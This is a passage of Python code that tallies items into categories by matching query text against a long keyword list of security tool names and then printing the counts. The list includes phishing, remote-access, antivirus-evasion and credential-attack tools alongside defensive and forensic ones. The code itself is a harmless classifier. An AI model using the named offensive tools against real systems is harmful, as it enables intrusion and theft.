            if cat in q.lower() or any(t in q.lower() for t in ['Sublist3r','theHarvester','Photon','recon-ng','AutoRecon','nmapAutomator','vulners','Legion','sqlmap','XSStrike','dirsearch','Arjun','Payloads','impacket','pwntools','BeEF','Exploit-Suggester','CrackMapExec','LinPEAS','BloodHound','PowerSploit','nishang','SharpCollection','patator','crowbar','Medusa','BruteX','wifite','bettercap','hcxtools','Pwnagotchi','Pacu','ScoutSuite','Prowler','CloudSploit','SkyArk','RsaCtfTool','hashID','haiti','CyberChef','sigma','Zeek','Wazuh','YARA','Veil','charlotte','Shellter','AMSITrigger','DefenderCheck','volatility','autopsy','chainsaw','LogonTracer','KAPE','yarGen','maltrail','CAPEv2','Quasar','GoPhish','evilginx','SocialFish','PhEmail','RouterSploit','binwalk','firmwalker','FACT','EMBA']):
                cats[cat] = cats.get(cat, 0) + 1
                break
    for k,v in sorted(cats.items()):
        print(f"  {k}: {v}")
